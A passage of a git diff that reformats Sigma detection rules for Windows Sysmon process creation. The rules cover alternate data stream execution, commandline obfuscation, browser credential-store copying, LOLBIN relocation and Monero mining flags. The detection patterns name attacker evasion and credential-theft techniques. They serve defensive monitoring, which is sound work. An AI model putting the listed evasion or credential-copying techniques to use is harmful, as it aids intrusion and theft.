Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml index 39847fe7a..e9fc693df 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml @@ -1,8 +1,7 @@ title: Execute From Alternate Data Streams id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c status: test -description: Detects execution from an Alternate Data Stream (ADS). Adversaries may - use NTFS file attributes to hide their malicious data in order to evade detection +description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md author: frack113 @@ -20,25 +19,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_stream: - CommandLine|contains: 'txt:' + CommandLine|contains: 'txt:' selection_tools_type: - CommandLine|contains|all: + CommandLine|contains|all: - 'type ' - ' > ' selection_tools_makecab: - CommandLine|contains|all: + CommandLine|contains|all: - 'makecab ' - .cab selection_tools_reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - ' export ' selection_tools_regedit: - CommandLine|contains|all: + CommandLine|contains|all: - 'regedit ' - ' /E ' selection_tools_esentutl: - CommandLine|contains|all: + CommandLine|contains|all: - 'esentutl ' - ' /y ' - ' /d ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml index 22c30101b..ff34c516c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml @@ -1,8 +1,7 @@ title: Always Install Elevated Windows Installer id: cd951fdc-4b2f-47f5-ba99-a33bf61e3770 status: experimental -description: Detects Windows Installer service (msiexec.exe) trying to install MSI - packages with SYSTEM privilege +description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_image_1: @@ -34,8 +33,8 @@ detection: filter_installer: ParentImage: C:\Windows\System32\services.exe filter_repair: - - CommandLine|endswith: \system32\msiexec.exe /V - - ParentCommandLine|endswith: \system32\msiexec.exe /V + - CommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" + - ParentCommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" filter_sophos: ParentImage|startswith: C:\ProgramData\Sophos\ filter_avira: @@ -48,8 +47,7 @@ detection: ParentImage|startswith: - C:\Program Files\Google\Update\ - C:\Program Files (x86)\Google\Update\ - condition: process_creation and (1 of selection_image_* and selection_user and - not 1 of filter_*) + condition: process_creation and (1 of selection_image_* and selection_user and not 1 of filter_*) falsepositives: - System administrator usage - Anti virus products diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml index 2b5cc6007..65365f8fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Windows App Activity id: f91ed517-a6ba-471d-9910-b3b4a398c0f3 status: experimental -description: Detects potentially suspicious child process of applications launched - from inside the WindowsApps directory. This could be a sign of a rogue ".appx" - package installation/execution +description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution references: - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -21,9 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: + # GrandParentImage|endswith: '\sihost.exe' ParentImage|contains: C:\Program Files\WindowsApps\ selection_susp_img: Image|endswith: + # You can add more LOLBINs - \cmd.exe - \cscript.exe - \mshta.exe @@ -33,19 +33,20 @@ detection: - \rundll32.exe - \wscript.exe selection_susp_cli: - CommandLine|contains: + # You can add more potentially suspicious keywords + CommandLine|contains: - cmd /c - Invoke- - Base64 filter_optional_terminal: ParentImage|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal ParentImage|endswith: \WindowsTerminal.exe + # Note: to avoid FP add the default shells and profiles that your WT integrates Image|endswith: - \powershell.exe - \cmd.exe - \pwsh.exe - condition: process_creation and (selection_parent and 1 of selection_susp_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Legitimate packages that make use of external binaries such as Windows Terminal level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml index c230f0b37..4547d9538 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml @@ -1,9 +1,7 @@ title: Arbitrary Shell Command Execution Via Settingcontent-Ms id: 24de4f3b-804c-4165-b442-5a06a2302c7e status: test -description: The .SettingContent-ms file type was introduced in Windows 10 and allows - a user to create "shortcuts" to various Windows 10 setting pages. These files - are simply XML and contain paths to various Windows 10 settings binaries. +description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 author: Sreeman @@ -23,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: .SettingContent-ms + CommandLine|contains: .SettingContent-ms filter: - CommandLine|contains: immersivecontrolpanel + CommandLine|contains: immersivecontrolpanel condition: process_creation and (selection and not filter) fields: - ParentProcess diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml index 1ad3e7984..60b104dca 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml @@ -1,10 +1,7 @@ title: Phishing Pattern ISO in Archive id: fcdf69e5-a3d3-452a-9724-26f2308bf2b1 status: test -description: Detects cases in which an ISO files is opend within an archiver like - 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files - in archives as email attachments to bypass certain filters and protective measures - (mark of web) +description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) references: - https://twitter.com/1ZRR4H/status/1534259727059787783 - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/ @@ -32,7 +29,6 @@ detection: - \ImgBurn.exe condition: process_creation and selection falsepositives: - - Legitimate cases in which archives contain ISO or IMG files and the user opens - the archive and the image via clicking and not extraction + - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml index 6c653c7d6..8f510dab3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml @@ -1,8 +1,7 @@ title: Automated Collection Command Prompt id: f576a613-2392-4067-9d1a-9345fb58d8d1 status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_ext: - CommandLine|contains: + CommandLine|contains: - .doc - .docx - .xls @@ -34,13 +33,13 @@ detection: - .pdf - .txt selection_other_dir: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /b ' - ' /s ' selection_other_findstr: OriginalFileName: FINDSTR.EXE - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /si ' condition: process_creation and (selection_ext and 1 of selection_other_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml index 233424d91..5e92b07eb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml @@ -1,19 +1,13 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 related: - - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add - type: obsoletes + - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add + type: obsoletes status: experimental -description: 'Detects attackers using tooling with bad opsec defaults. - - E.g. spawning a sacrificial process to inject a capability into the process without - taking into account how the process is normally run. - - One trivial example of this is using rundll32.exe without arguments as a sacrificial - process (default in CS, now highlighted by c2lint), running WerFault without arguments - (Kraken - credit am0nsec), and other examples. - - ' +description: | + Detects attackers using tooling with bad opsec defaults. + E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. + One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec @@ -22,8 +16,7 @@ references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback -author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron - Systems), Christian Burkard (Nextron Systems) +author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) date: 2020/10/23 modified: 2023/12/02 tags: @@ -39,33 +32,33 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_werfault: Image|endswith: \WerFault.exe - CommandLine|endswith: WerFault.exe + CommandLine|endswith: WerFault.exe selection_rundll32: Image|endswith: \rundll32.exe - CommandLine|endswith: rundll32.exe + CommandLine|endswith: rundll32.exe selection_regsvcs: Image|endswith: \regsvcs.exe - CommandLine|endswith: regsvcs.exe + CommandLine|endswith: regsvcs.exe selection_regasm: Image|endswith: \regasm.exe - CommandLine|endswith: regasm.exe + CommandLine|endswith: regasm.exe selection_regsvr32: Image|endswith: \regsvr32.exe - CommandLine|endswith: regsvr32.exe + CommandLine|endswith: regsvr32.exe filter_main_edge_update: ParentImage|contains|all: - :\Users\ - \AppData\Local\Microsoft\EdgeUpdate\Install\{ filter_optional_chrome_installer: + # As reported in https://github.com/SigmaHQ/sigma/issues/4570 ParentImage|contains|all: - :\Users\ - \AppData\Local\Google\Chrome\Application\ ParentImage|endswith: \Installer\setup.exe ParentCommandLine|contains: --uninstall --channel=stable Image|endswith: \rundll32.exe - CommandLine|endswith: rundll32.exe - condition: process_creation and (1 of selection_* and not 1 of filter_main_* and - not 1 of filter_optional_*) + CommandLine|endswith: rundll32.exe + condition: process_creation and (1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unlikely level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml index 79172932f..5538eee95 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml @@ -1,15 +1,13 @@ title: Suspicious Child Process Created as System id: 590a5f4c-6c8c-4f10-8307-89afe9453a9d status: test -description: Detection of child processes spawned with SYSTEM privileges by parents - with LOCAL SERVICE or NETWORK SERVICE accounts +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://github.com/antonioCoco/RogueWinRM - https://twitter.com/Cyb3rWard0g/status/1453123054243024897 -author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research - (OTR) +author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) date: 2019/10/26 modified: 2022/12/15 tags: @@ -31,17 +29,17 @@ detection: ParentUser|endswith: - \NETWORK SERVICE - \LOCAL SERVICE - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI - User|endswith: + User|endswith: # System - \SYSTEM - - "\\Syst\xE8me" - - "\\\u0421\u0418\u0421\u0422\u0415\u041C\u0410" + - \Système + - \СИСТЕМА IntegrityLevel: System filter_rundll32: Image|endswith: \rundll32.exe - CommandLine|contains: DavSetCookie + CommandLine|contains: DavSetCookie condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml index 5cd9f3718..279d28b02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml @@ -4,8 +4,8 @@ status: test description: Detects potential commandline obfuscation using known escape characters references: - https://twitter.com/vysecurity/status/885545634958385153 - - https://twitter.com/Hexacorn/status/885553465417756673 - - https://twitter.com/Hexacorn/status/885570278637678592 + - https://twitter.com/Hexacorn/status/885553465417756673 # Dead link + - https://twitter.com/Hexacorn/status/885570278637678592 # Dead link - https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques - https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ author: juju4 @@ -23,7 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # - # no TAB modifier in sigmac yet, so this matches (or TAB in elasticsearch backends without DSL queries) - h^t^t^p - h"t"t"p condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml index deaa284c6..d6756f738 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml @@ -1,16 +1,12 @@ title: Potential Commandline Obfuscation Using Unicode Characters id: e0552b19-5a83-4222-b141-b36184bb8d79 related: - - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 - type: obsoletes + - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 + type: obsoletes status: test -description: 'Detects potential commandline obfuscation using unicode characters. - - Adversaries may attempt to make an executable or file difficult to discover or - analyze by encrypting, encoding, or otherwise obfuscating its contents on the - system or in transit. - - ' +description: | + Detects potential commandline obfuscation using unicode characters. + Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http @@ -29,27 +25,27 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 selection_other: - CommandLine|contains: - - "\xE2" - - "\u20AC" - - "\xA3" - - "\xAF" - - "\xAE" - - "\xB5" - - "\xB6" + CommandLine|contains: + - â + - € + - £ + - ¯ + - ® + - µ + - ¶ condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml index 6521dac38..ca5c1df1b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml @@ -1,8 +1,7 @@ title: Potential Command Line Path Traversal Evasion Attempt id: 1327381e-6ab0-4f38-b583-4c1b8346a56b status: experimental -description: Detects potential evasion or obfuscation attempts using bogus path traversal - via the commandline +description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline references: - https://twitter.com/hexacorn/status/1448037865435320323 - https://twitter.com/Gal_B1t/status/1062971006078345217 @@ -22,16 +21,16 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_1: Image|contains: \Windows\ - CommandLine|contains: + CommandLine|contains: - \..\Windows\ - \..\System32\ - \..\..\ selection_2: - CommandLine|contains: .exe\..\ + CommandLine|contains: .exe\..\ filter_optional_google_drive: - CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ + CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ filter_optional_citrix: - CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ + CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) falsepositives: - Google Drive diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml index 67cb14416..fc0143ef2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml @@ -1,19 +1,13 @@ title: Potential Browser Data Stealing id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b related: - - id: fc028194-969d-4122-8abe-0470d5b8f12f - type: derived + - id: fc028194-969d-4122-8abe-0470d5b8f12f + type: derived status: experimental -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md author: Nasreddine Bencherchali (Nextron Systems) @@ -31,23 +25,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - CommandLine|contains: - - copy-item - - 'copy ' - - 'cpi ' - - ' cp ' - - 'move ' - - move-item - - ' mi ' - - ' mv ' - - Image|endswith: - - \xcopy.exe - - \robocopy.exe - - OriginalFileName: - - XCOPY.EXE - - robocopy.exe + - CommandLine|contains: + - copy-item + - 'copy ' + - 'cpi ' + - ' cp ' + - 'move ' + - move-item + - ' mi ' + - ' mv ' + - Image|endswith: + - \xcopy.exe + - \robocopy.exe + - OriginalFileName: + - XCOPY.EXE + - robocopy.exe selection_path: - CommandLine|contains: + CommandLine|contains: - \Amigo\User Data - \BraveSoftware\Brave-Browser\User Data - \CentBrowser\User Data diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml index 9d40a20f7..590e522c3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml @@ -1,15 +1,13 @@ title: Copy From Or To Admin Share Or Sysvol Folder id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 status: test -description: Detects a copy command or a copy utility execution to or from an Admin - share or remote +description: Detects a copy command or a copy utility execution to or from an Admin share or remote references: - https://twitter.com/SBousseaden/status/1211636381086339073 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ -author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, - Zach Stanford @svch0st, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali date: 2019/12/30 modified: 2023/11/15 tags: @@ -28,30 +26,30 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_target: - CommandLine|contains: + CommandLine|contains: - \\\\*$ - \Sysvol\ selection_other_tools: - - Image|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - Image|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_cmd_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: copy + CommandLine|contains: copy selection_pwsh_img: - - Image|contains: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|contains: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - copy-item - 'copy ' - 'cpi ' @@ -60,8 +58,7 @@ detection: - move-item - ' mi ' - ' mv ' - condition: process_creation and (selection_target and (selection_other_tools or - all of selection_cmd_* or all of selection_pwsh_*)) + condition: process_creation and (selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)) falsepositives: - Administrative scripts level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml index e5b2a3f85..f0508dd18 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml @@ -1,23 +1,17 @@ title: Suspicious Copy From or To System Directory id: fff9d2b7-e11c-4a69-93d3-40ef66189767 related: - - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 - type: derived + - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 + type: derived status: test -description: 'Detects a suspicious copy operation that tries to copy a program from - system (System32, SysWOW64, WinSxS) directories to another on disk. - - Often used to move LOLBINs such as ''certutil'' or ''desktopimgdownldr'' to a - different location with a different name in order to bypass detections based on - locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. + Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ -author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) date: 2020/07/03 modified: 2023/08/29 tags: @@ -33,33 +27,32 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: Image|endswith: \cmd.exe - CommandLine|contains: 'copy ' + CommandLine|contains: 'copy ' selection_pwsh: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' selection_other: - - Image|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - Image|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE target: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS condition: process_creation and (1 of selection_* and target) falsepositives: - - Depend on scripts and administrative tools used in the monitored environment - (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) - - When cmd.exe and xcopy.exe are called directly + - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) + - When cmd.exe and xcopy.exe are called directly # C:\Windows\System32\cmd.exe /c copy file1 file2 - When the command contains the keywords but not in the correct order level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml index 28a283176..2628bc499 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml @@ -1,14 +1,11 @@ title: LOL-Binary Copied From System Directory id: f5d19838-41b5-476c-98d8-ba8af4929ee2 related: - - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 - type: derived + - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 + type: derived status: experimental -description: 'Detects a suspicious copy operation that tries to copy a known LOLBIN - from system (System32, SysWOW64, WinSxS) directories to another on disk in order - to bypass detections based on locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -28,30 +25,31 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_tools_cmd: Image|endswith: \cmd.exe - CommandLine|contains: 'copy ' + CommandLine|contains: 'copy ' selection_tools_pwsh: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' selection_tools_other: - - Image|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - Image|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_target_path: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS selection_target_lolbin: - CommandLine|contains: + CommandLine|contains: + # Note: add more binaries to increase coverage - \bitsadmin.exe - \calc.exe - \certutil.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml index 5dbfbe4c6..4f4fb5e3f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' --cpu-priority=' - --donate-level=0 - ' -o pool.' @@ -27,9 +27,11 @@ detection: - 